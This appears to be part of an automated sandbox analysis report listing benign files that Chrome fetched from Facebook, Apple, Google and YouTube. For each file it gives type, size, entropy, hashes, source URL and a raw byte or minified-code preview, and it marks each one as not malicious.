                                                                                                                                                                                                                                  Preview:RIFFP...WEBPVP8 D........*..(.>i*.E."..+Nt@...5M.{..v`......{...g...|}Yh/..K}?.>..................O~....?.......=..............;.....w....^.?........................................W.o..`......?.p....'.........s..{.c..O.=J.{..._.x.3>..Q.{.......[.'.?...w.....~q................/...........3.....^.....o...?u.....`.....c.....|S...7............,.............?....i.!.....O._................~._..........z.&`.3.8.....!......f.E...H9b....C.F.g9....w(..f."........Ki(...{..j.V.%....%.J...S..wZQ.&..q3......w(.}R...rq.Ek........?..>..?..J..2=.=.,.sq'..{.4.jz!...g...BZ%.....Q)...:.R.35.......U...c.7....,[*$x..me'..I#.......(6N..I..Cx.j...".r..{A.@.x. .8s.r...m.->1..n.......A.....6..0Xj.._..Z.5.]Gb..*..r....7.'..{......c}F$OI.f..vW..@._....ns;.XM3.n?.....W....~.q..p..............W.c..#..x........L.~E.w.6......U>c.y(....M.l..!....&n`.v....5..-.+.j..uC;.v..4...a...'.=..Lqx......?v...BQ........]5,.sTf#.g...~.6>...U.djZ...h......,..J......-.'A.....]Q.lj..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4009)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):29711
                                                                                                                                                                                                                                  Entropy (8bit):5.317426289518869
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:G13AcfZ02LoynipF5Og2kXGe8IcsGAGzaIlJKIV8EQFayvS+jMC1Kju:a5nipF5OSAIcsGAUdRqELZ+wAKju
                                                                                                                                                                                                                                  MD5:9F5BC0996E07E4C660060EF0BE768D39
                                                                                                                                                                                                                                  SHA1:BACF1E16033FFF53F72BE731B4AC0D1826EBDB72
                                                                                                                                                                                                                                  SHA-256:700531CE6BDFF627D99D5C08A1D2FF91317BF6A2F6FF6F2481FF91B98A0664B8
                                                                                                                                                                                                                                  SHA-512:2A17F100F9869C7365E16150473A064A4EDCC56A667F608D7AC4DCD0CED0A2FEBFF9B6D6EE4A07A44B7376B13AC818174D723415AFADF10D7EB117A8A4397102
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3ixu44/yU/l/en_GB/Iud4PfRtk1i.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("FBClipboardLink.react",["cx","fbt","Clipboard","DOMContainer.react","Event","KeyEventController","ReactDOM_DEPRECATED","SubscriptionsHandler","Tooltip.react","isKeyActivation","joinClasses","react","stylex"],(function(a,b,c,d,e,f,g,h,i){var j,k,l=k||d("react");a=function(a){babelHelpers.inheritsLoose(b,a);function b(){var b,c;for(var e=arguments.length,f=new Array(e),g=0;g<e;g++)f[g]=arguments[g];return(b=c=a.call.apply(a,[this].concat(f))||this,c.$1=l.createRef(),c.state={copied:!1,supported:d("Clipboard").isSupported()},c.$2=null,c.$3=null,c.$5=function(a){a.clipboardData&&(a.clipboardData.setData("text/html",c.$8()),a.clipboardData.setData("text",c.$9()),a.preventDefault())},c.$7=function(){if(!c.state.supported)return"Unsupported in this browser";return c.state.copied?c.props.tooltipSuccess:c.props.tooltip},c.$4=function(){c.$3&&(window.clearTimeout(c.$3),c.$3=null)},c.$10=function(){c.$3=window.setTimeout(c.$11,c.props.tooltipSuccessDuration)},c.$6=function
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:M3U playlist, ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):905
                                                                                                                                                                                                                                  Entropy (8bit):5.361446549873423
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:lfRcdcVhdcVdcIgdcf2dciUdcBTdcedc4:lfRycdcPcRcwczcfcQc4
                                                                                                                                                                                                                                  MD5:AE554E0C8CBF7B2A1F2CD56AE507A45D
                                                                                                                                                                                                                                  SHA1:E596105E518982DFB710319E098B05D41D99C048
                                                                                                                                                                                                                                  SHA-256:EB31B3FC34652722DBA7B80CFF4787C380AB3EC932412979A7095DB64E15280D
                                                                                                                                                                                                                                  SHA-512:FAFF8C5931D7311A80C447F31605F285804ED259A8F819BE64DF1DB4AA858C99D83A7AB26D04A3C288F8095D0AEA7BB2886979DC73D5B9EF37D0F80E44C518F3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/8f/cb/4e/8fcb4e35-30df-c295-bbd9-4760d511ef3e/P875466468_Anull_video_gr265_sdr_886x1920.m3u8
                                                                                                                                                                                                                                  Preview:#EXTM3U.#EXT-X-TARGETDURATION:6.#EXT-X-VERSION:7.#EXT-X-MEDIA-SEQUENCE:0.#EXT-X-PLAYLIST-TYPE:VOD.#EXT-X-INDEPENDENT-SEGMENTS.#EXT-X-MAP:URI="P875466468_Anull_video_gr265_sdr_886x1920-.mp4",BYTERANGE="899@0".#EXTINF:3.60000,..#EXT-X-BYTERANGE:2126676@899.P875466468_Anull_video_gr265_sdr_886x1920-.mp4.#EXTINF:5.70000,..#EXT-X-BYTERANGE:2819907@2127575.P875466468_Anull_video_gr265_sdr_886x1920-.mp4.#EXTINF:3.53333,..#EXT-X-BYTERANGE:1156204@4947482.P875466468_Anull_video_gr265_sdr_886x1920-.mp4.#EXTINF:2.63333,..#EXT-X-BYTERANGE:926878@6103686.P875466468_Anull_video_gr265_sdr_886x1920-.mp4.#EXTINF:3.63333,..#EXT-X-BYTERANGE:2260694@7030564.P875466468_Anull_video_gr265_sdr_886x1920-.mp4.#EXTINF:5.70000,..#EXT-X-BYTERANGE:2680108@9291258.P875466468_Anull_video_gr265_sdr_886x1920-.mp4.#EXTINF:5.20000,..#EXT-X-BYTERANGE:1934725@11971366.P875466468_Anull_video_gr265_sdr_886x1920-.mp4.#EXT-X-ENDLIST.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10070
                                                                                                                                                                                                                                  Entropy (8bit):7.9735241994969
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:nJ2qhBr+ro1Q67Lxp9i2D2FT/KMCghBP2SKi1Jm5iMEYbKPJjhafc6WuogtJLrR:pLQ8Zp6FTG+cAYbCJVafc6ZogTJ
                                                                                                                                                                                                                                  MD5:D3B1947056DDCA3E7F65C178BB17B96E
                                                                                                                                                                                                                                  SHA1:CACEDCEAD9F4E9BA36485217EF54C96C4C682C57
                                                                                                                                                                                                                                  SHA-256:BE9D202F5B6B0FD323E40CA24ACB93AE0D736802529070E8ADDABB2732780F0F
                                                                                                                                                                                                                                  SHA-512:2CCFAE55A1569FCAA97D42A4FBCB8DF9D17755C9C8E72FE1FCA42E68FB40016AC5081AEEF29DD8D2B21E4A1F32BD03245613C819841CB678FDF4F61DB75395ED
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFFN'..WEBPVP8X........?..?..VP8L.'../?...M0h.H.%..w..>........\......3..=.[.a......F...N.`...1.4.8.4.....I....L...$).=...........XKe...l..{]=C'oN......D..'..e.^.@A.)...r.7.|...R...F.9.....|..B.........,.P. 2.,...T&V..^..gS.s0..m..?.m?........C......o.m...?+..1.j...c...58N.m.........;m.M..N~.%..)n#..SU].V."K.d+.!N.;..33.2333.._f.,3op`1.!.8.c.-Y,u....o.)R.m.!U-....!.....z......?w......^.;7.rZ. '...0.3.Uu.....m#I..."%.x.....bR....`3.gC.....x.Z.I.i.m[.U.9.>.w..2J..R..C.(d4.@#&.......Um.k.{?.!....I)G.$bP............nq....7?....8..~..N.$D.]l)g.X...7.7..66.....OF/y.......-...._....j.....Df-R.?J,..cQ#.G.V.Rm.W....=5...X....R....i.|1...3O.<..f0.".*..z4.d.=........7&.}5..~..R.....po.;..].t"b.rH.....@AH.<.>.o...n..K='_^.>.7...L...j.gW....Qc.rAe..!W..^Zv.rQ..p....$^.S.X..-.......;...h!..F3+..O....{....C.;j.E'mR.-..e.T|...FL?q..... <.R.H.$.o..o.'.S.HK.rP4U.bP..G...3.-L.Q..3.....u_h.....mU.lr.j....!..1Q.h>..._Yl....."h..V=.?..k.......gsa.]w......:
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (6078)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):9845
                                                                                                                                                                                                                                  Entropy (8bit):5.240704384788954
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:zbSDfbbLJTpAX1lsfzNcRMtuzibSDLp1nmtNgb8JzGHzCrKI3qPMc33wBgxOxPHo:z2fbPJu1lsfzNcRg2i27nmtNgolG3XZh
                                                                                                                                                                                                                                  MD5:7A5CAC4380406D9DF2E192904976505F
                                                                                                                                                                                                                                  SHA1:8F2A83E30BB8C97954B6941E22E91418E16DCD6F
                                                                                                                                                                                                                                  SHA-256:C2F0A7C478DBE90FCD594DB0A07442A9802DBBDF3FCA00F4DCDD8F3052879EEF
                                                                                                                                                                                                                                  SHA-512:54F3DA732B64E5B1743A75A96B19398AAB933823E7D8E9F98FC700EB2444BF4EAAF82A7CD463F0F29389DC63494A799A072307B4BCBA8D70351319ECB2257216
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yW/r/ypejlg-I21y.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("EmojiRendererData",[],(function(a,b,c,d,e,f){"use strict";a=function(){function a(){}a.isEmoji=function(a){return a>983041||a<35?!1:a===35||a===42||a>=48&&a<=57||a===169||a===174||a===8205||a===8252||a===8265||a===8419||a===8482||a===8505||a>=8596&&a<=8601||a>=8617&&a<=8618||a>=8986&&a<=8987||a===9e3||a===9167||a>=9193&&a<=9203||a>=9208&&a<=9210||a===9410||a>=9642&&a<=9643||a===9654||a===9664||a>=9723&&a<=9726||a>=9728&&a<=9732||a===9742||a===9745||a>=9748&&a<=9749||a===9752||a===9760||a>=9762&&a<=9763||a===9766||a===9770||a>=9774&&a<=9775||a>=9784&&a<=9786||a===9792||a===9794||a>=9800&&a<=9811||a>=9823&&a<=9824||a===9827||a>=9829&&a<=9830||a===9832||a===9851||a>=9854&&a<=9855||a>=9874&&a<=9879||a===9881||a>=9883&&a<=9884||a>=9888&&a<=9889||a===9895||a>=9898&&a<=9899||a>=9904&&a<=9905||a>=9917&&a<=9918||a>=9924&&a<=9925||a===9928||a>=9934&&a<=9935||a===9937||a>=9939&&a<=9940||a>=9961&&a<=9962||a>=9968&&a<=9973||a>=9975&&a<=9976||a===9978||a===9981||a===9986||a==
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4092)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13176
                                                                                                                                                                                                                                  Entropy (8bit):5.294987153659635
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:58XZIa+UNj42EGkIa+UNjh2EBYgat0b29PRnNGRX2JZun+npvJIxajAQ5uL6:58pNE7NSrt0b29ZnE1KZu+5mx/Q5uO
                                                                                                                                                                                                                                  MD5:2645EFD84E35194CF6A31C1F7B29F077
                                                                                                                                                                                                                                  SHA1:E6F807F825FEA2575C0EC1BD05B5A305B0C33F0B
                                                                                                                                                                                                                                  SHA-256:2530726858E9A0B705EA05C9AF57F2910A9A84871D716D68332E0CB6D306E15D
                                                                                                                                                                                                                                  SHA-512:D31EF5851FA2EB31FE84A41A9EE4B0D698742A4C3B4DCE033C02B64E8A1673FE9A20C73BC4BC89C58B703AFE8845748957D017AA95ACEB8BF8CFDEDF8E2377EB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("tidyEvent",["Run"],(function(a,b,c,d,e,f,g){var h=[];function i(){while(h.length){var a=h.shift();a.remove?a.remove():a.unsubscribe&&a.unsubscribe()}}function j(a){var b,c=a;function d(){if(!b)return;b.apply(c,arguments);b=null;c=null}if(c&&c.remove)b=c.remove,c.remove=d;else{b=(a=c)==null?void 0:a.unsubscribe;c.unsubscribe=d}return c}function a(a){h.length||d("Run").onLeave(i);if(Array.isArray(a))for(var b=0;b<a.length;b++)a[b]&&h.push(j(a[b]));else a&&h.push(j(a));return a}g["default"]=a}),98);.__d("DeviceBasedLoginForm",["Event","tidyEvent"],(function(a,b,c,d,e,f,g){"use strict";function a(a,b){c("tidyEvent")(c("Event").listen(a,"click",function(a){a.preventDefault(),b.submit()}))}g.init=a}),98);.__d("DeviceBasedLoginUserLoginDialog",["BDClientSignalCollectionTrigger","BDSignalCollectionData","Base64","Button","DOM","Event","FBBrowserPasswordEncryption","LoginServicePasswordEncryptDecryptEventTypedLogger","cx","ge","promiseDone","tidyEvent"],(function(a,b,c,d
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):338
                                                                                                                                                                                                                                  Entropy (8bit):5.208806049437518
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvnNoz6AuGNG/QVINFhipgVtMwQRaNw6JpyxZRNlad0:kRZTFN8I/AIhiaRkbRN20
                                                                                                                                                                                                                                  MD5:0F0BF36A08EB205FF9956D505050FB48
                                                                                                                                                                                                                                  SHA1:F3DF0EE70B16A33D3FAE366B8D0D021B4500A3CD
                                                                                                                                                                                                                                  SHA-256:758E0B419F2CE15E0D64C23824C072C0AE0A77D4B64C47E5CD76E680832B309E
                                                                                                                                                                                                                                  SHA-512:885D5E673C91CF66DAC1A29E624957FC8AD26F3DB5E5F5334570EFE3E08E45C0DEFFD84DEF0569741BECAD3498405CFA5550DE0AC06A8277983E03B6328849DF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("RBsfwb");._.qr(_.bCa,class extends _.rr{constructor(a){super(a.ta)}H(){return"RBsfwb"}N(){return!0}Xa(){return _.SOc}});_.$q.RBsfwb=_.nA;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 17 x 569, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2936
                                                                                                                                                                                                                                  Entropy (8bit):7.492824796189044
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:Yzg8aI9H81I9fkWIJrZ0TmIWHXU7TILF8qUx9pDshFNVR9WzxogKEuMOXJokI:l8aEc69f9wZ0DgF7Ux9xsd9AbVR
                                                                                                                                                                                                                                  MD5:C52099A3430BD9F2A3F30613702ECD1D
                                                                                                                                                                                                                                  SHA1:3D93D69D3A7A0485CD8678DAF7C729DFB4E7A93C
                                                                                                                                                                                                                                  SHA-256:05E39A5F006C8AFE017A099E13E57762C6CFB42BDE83DD7FBF622D04AE483D5C
                                                                                                                                                                                                                                  SHA-512:FE760FD5C097987F1991B06406FA26FDE9B89755305FDC1358B12E3C99BA47832561499EB9977C3DB09EEB5C4181F61F0E4C5DA9EDAF6DEAC5681BFB8434FED8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:.PNG........IHDR.......9.....p.!.....PLTEGpL......JNU777`gq.........BGO`gq...@DJ.........`gq...JNUHLSJNU......`gq......JNU.........`gq.................JNUJNU........JNU...JNUJNU......`gqJNUJNU...JNU......BGO.....777.....777BGO...`gq...bgo>..>..>..>..>..JNU...............JNU......JNU...DHO`gq.........`gqJNUKOV........KOVRW_...............JNU..........................`gq......>.......................`gq...777...BGO...777......>...........JNU..........................`gq...............`gq.........JNU......JNU`gq........................`gq`gq.........JNU...`gq...JNU...........>...........KOV...`gq............`gqKOV........................>..`gq...`gq...............JNUJNUJNU.........JNU...>..>..JNU...JNU............`gq`gq............`gq`gqJNU>.....>..>........JNU>..`gq........BGO777.........f.6m....tRNS.............:p....:.......e...;..lll........I.L........llllll....d.p.Ld.....d:......<T......t........:.88.....6....::::....d.x.......m.....g.E...jXz.....M<*.$(\$.<."`NzbbL..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 526x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):19720
                                                                                                                                                                                                                                  Entropy (8bit):7.988703628228792
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:wwHG9TRaKXK0otm1eD7/tVycSDYDv6HyXWbvpGeLFDnlVzl0V0D/J+DoLuI7K9:RaR/OtzztbvXWbvPQ2DhyI+9
                                                                                                                                                                                                                                  MD5:B83BF3A177E8E342C21DE75C24C5CE0D
                                                                                                                                                                                                                                  SHA1:BAF66E6DC0B88A068FB7A554CDEB3D4788C96715
                                                                                                                                                                                                                                  SHA-256:A3E0BED74E616BEEA0F43FFB8F67780D3854BF650CC9BE92D867AED8E8548528
                                                                                                                                                                                                                                  SHA-512:4C34115B1B5F7CB97249B1A84D697BE8F30C6506931C9579591930E4109FA49571C5ED5E247335407CEB4EA73668CD59F032780E34A134360F925F7D7F9E2BD4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF.M..WEBPVP8 .L..p?...*..(.>E..E"....].(.D..^.Lop/.. ._ZZ4H...?...{....f{3..|...._...._.=Y~..........'.....?...h.p=.....{......../......}s=........#......]o._...|..b...m.'.......7....\.....o.<A.?./.?o}..oi..?,~.._..o.|;...7._.w...?..d.z....?........U.s._..?.[.......Oc..x..[._.'.......~a|...........|../...7.?.g.g.Ot.._.=.b...W.R.....H\.B.a....o.......n.]....B.... .^....N......?..jp.FRyf...;3...`..f.;"U..e..)...2.\.]..............rk...V...=...A.6..$......9M.t_Jo.Q.....I'.......ly.`.K..D....i..[ 8........"Z`&..^..m...7.....X.....a..?...U.?}.F.F....I....W...G....S/.].9{.uW.F{k~.+..Y..[...h....PH....h..].....#.!.#R...VO..|...J.mK.....K.9...%.T...s.....>.mA..W)..1......x....a..=Y.^..=....+8A..61F.J.....q......BNQ:4...l.M[8M...E.o.o.....5..j..........8@.!@.#..6...7..iU.W..Zwg..Z....T......_.9*..~.U.z]..L{|..}....o.H......1].g...2...2...Yj....P..RV...c...[......W.4..x}..C..?......I.e.......^.}...w..w..4S..6......j.r.or...k..a.'.P
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 109628, version 1.0
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):109628
                                                                                                                                                                                                                                  Entropy (8bit):7.997834372736158
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:3072:I/PVzzcH7zULTR9S41qKYgEtXD/PhU/ffXEMY96gYGWPrInVe:+PlLd9N1qjxhYcZW84
                                                                                                                                                                                                                                  MD5:67A9B38ABD1F9F80D5ED943760F1C1E6
                                                                                                                                                                                                                                  SHA1:9C646D28E62FCF3C4A1ECF7043632FAE3DEA6270
                                                                                                                                                                                                                                  SHA-256:8D73261B2DB18AF30E93ACBC8E8591E0784706FC283C37C465F92012256757D2
                                                                                                                                                                                                                                  SHA-512:A479BB307B03F74202B24E95D85085E8855C48713E443F5EAE0CABD077D45282F8765BCD6D36733AC336504E1AE1B1C3CA3BB41A428F8A240EE7E7B91FAB39B8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://www.apple.com/wss/fonts/SF-Pro-Display/v2/sf-pro-display_semibold.woff2
                                                                                                                                                                                                                                  Preview:wOF2.......<......xd..................................H.`*H...X...4....6.$..$..(.. ?meta.#..`. 8.t[.w...O.....m...ElU6......#..@dc..~.....1D'I@=h...3.m......*.............w'.H....^....P.P. .("...Y.K..4...i..R..Y.WH1..27..b..J.N.....C.C..'.h...{.f.8.2K9...[&...i/*>b_8@..yX..q..=Qw=.......\Li.t..Q.....`Ov1.i.y............q..4#.(a.7...A8n.|b...{o...Q.0}w.CL..ft...M.b...p...(.s....19...L....l...k.KJ6n...7....F*Zt....|oc.n=l......5~!p.1...SOX.+.dn....Be*.s..}.*T..'.......4y2.*...,u..+U..]..~~.$..O...z....r.dEg.......<..yN%*Q%8}...a.qu..]M...zcGwY...q.!#..,..4......n.X.W..B..s...i...B.`.DD"..b........c1....24w..\G.p....~.4.....M.^x.W.......[.CbS..b4.Q.c..N.."..._....t.-...F...q 'W.O..I......MjBX......?.nF......Ih.y..b.P*.S..A..H..l.v}d.m..~...7.<.?..../...,$.).m&.."Tw....?.v..m..k>;v.Hf...c..."k......$;*....Z...../{.........K.~."cXa..aQf.6[.U....>...d...P....j.diUI.'1...{.w6w.%.P..U....m.X..).%..K.......Z.Pr.2."...66`#kd.....U...E{.U}..^{..._..;..W).
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 166x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):10246
                                                                                                                                                                                                                                  Entropy (8bit):7.978999223454442
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:v7jJbSUZezdwCm4Wx+Xz6IVVfrF2LNaCvVnBlhZBRnQ9MuLl9kJbzJT+XQt6egP2:v7jVwqCm8RbrONaCtBrXRn09kJbEg
                                                                                                                                                                                                                                  MD5:7645FD5C78AC035544B12627574D410B
                                                                                                                                                                                                                                  SHA1:3F70DC0F130CC0D29EA09ADFD62FF9C525BF2EA6
                                                                                                                                                                                                                                  SHA-256:AD79026C7E873DCA90C2DB7D126F63B3A29BC5F5A30C787A63B5C65BFEF17D66
                                                                                                                                                                                                                                  SHA-512:33BCD63593F476E4486C8328231F0C28C84808927E3AB8668B91B597B6053C8B69B5EEE5E15CEEB5F05C95335708870C449BF23ADCD72709CDF0CF1E19B82CB5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/JtygOZ9IrtJsXLqQ1DszTLkSGwcRYmOcI6YeBU0ul2vhh9FII7eqZa6Lk2VBcHQiQCav=w526-h296-rw
                                                                                                                                                                                                                                  Preview:RIFF.'..WEBPVP8 .'......*..(.>U$.E#.!..8.D.7n..0....~]w.w.!..........c.g._..p.a...?2..|.............?N?..R.o...................~.{......_..w........._.?........6.....K._.S....._P...a.s...../..<|_.;.O...^...._x.E......~..j...;.....5..v.....E..................h?.{../.....+..............a.s........}4.k.k...G...?....9.......w..........=.[./...7.....Ca....Ti.Rt.o2.v.o.}.f...x....'[qt/...E_,....|...7..........P.Q..l.........R.-.....G...L...5.|s.+...z.O.[...dz....b...6.Ku.C...Y..[.V...ea.'.V..y....n.V.?...]W.:.O.}..P.?........d.#LO.h.......:.^.,......:.+..%.....h9q.t...{*.20.ca.NNjm.k..U....P..6..aM.....Q.f..8B...D@..}k......V.yn..b..w....(.,m...d.....+j.n./5k.C?a.ht.W..I...|.-I8.....;$v.3B..;~...JcS.Og.Y.,4.F.P4..QR..P+U-Cq\....8..M......8.z.C|c.UDx|D.^.....s..I.L.M.Url6..r]......GN.C..I .I...HX..u+h".k...-.......`..oMJD.|.Z&...t-y.T...gJ9 .^jM.n.;.Y...I.C..{*.su[....l.iBo9...r..N.@k...{l?..'..$..V;DI..R.7X.|..L%.8.......,.....W+...X,swp>l.Y.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 480x360, components 3
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):21773
                                                                                                                                                                                                                                  Entropy (8bit):7.954465641727542
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:+10Ekzqs4P5i/D1nO4Ixi1Ivc0JKiyMHXLnaZ38zE2kic:+10Nzr4P5i/NyB04ZbaNWEpic
                                                                                                                                                                                                                                  MD5:64F1E3012F9A355E80B09E0114962619
                                                                                                                                                                                                                                  SHA1:9EF01FC4267FAA6BBA7343EB1842D816254AF3D7
                                                                                                                                                                                                                                  SHA-256:8D8FA69C8671B80030FC638E8532CBCF8CEF8158D4CAA2B69EF31F09544352CB
                                                                                                                                                                                                                                  SHA-512:93F8A2351AD8DB3F9E5E74E9112A8394D0E89169A87E644F016C15BA95578BE8C5514AC1BA16B03FA98DEFD9AE750D4AFCB57411CFAC9C41CC98677DE64D6C04
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://i.ytimg.com/vi/8TVDWzeRSQs/hqdefault.jpg
                                                                                                                                                                                                                                  Preview:......JFIF............................."-%""""*(-'%.'100.--5=PB78K9--EaEKSV[\[5AemdXlPY[W......./..0W?9?WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW......h....".......................................L........................!1.AQaq..."....2BR.....r#Sb....$3C......cs...4.5Td..............................,.......................!1.A.Q"a.2#Bq....3R............?.......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B.....f..O.....u..|..&....:7[...Jc....\....)..[....._....$......jS..$-..F.}.\...[.I....(S9...t........!.+_.(|O.T.g,....l.e....?........b.9$.....~...?.U?.v..R.....U...M...Hz.j.e....j...i..Q.....!.[./..B..IZ=.?.......k...f#.?.VS...%.9D.........?.G.sm.m....T.........?.............b..B.?..o.l.......sm.m...........-..K?....D..._.,........r.]w.ul.m..........O...9........,.....S..j...?.K'VsH]..:...........~...-..9.....i...N
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8110
                                                                                                                                                                                                                                  Entropy (8bit):7.965876040183802
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:34J/KsYwindEURO+mGoJdHpEi2vXNJU9ihYMM4hnZQ:34JhJinOIO+mRdHWi4wPTR
                                                                                                                                                                                                                                  MD5:99845E7231464904E41907E812C47242
                                                                                                                                                                                                                                  SHA1:C3A70E863FC8067CA68BFDEA06E2F3968AB2E596
                                                                                                                                                                                                                                  SHA-256:D5AFD12A59DB14ED22BFBCF55590859F5547E4A98B018542BD06464711CC5AB6
                                                                                                                                                                                                                                  SHA-512:07D75886E835C3B54B9D50F5C74B92D49F912A297285462D9A86F4DE597E72618B19FD3EAD8413583E94912615E5A6700DF79E0A877E967A6DE7DC98126CD070
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
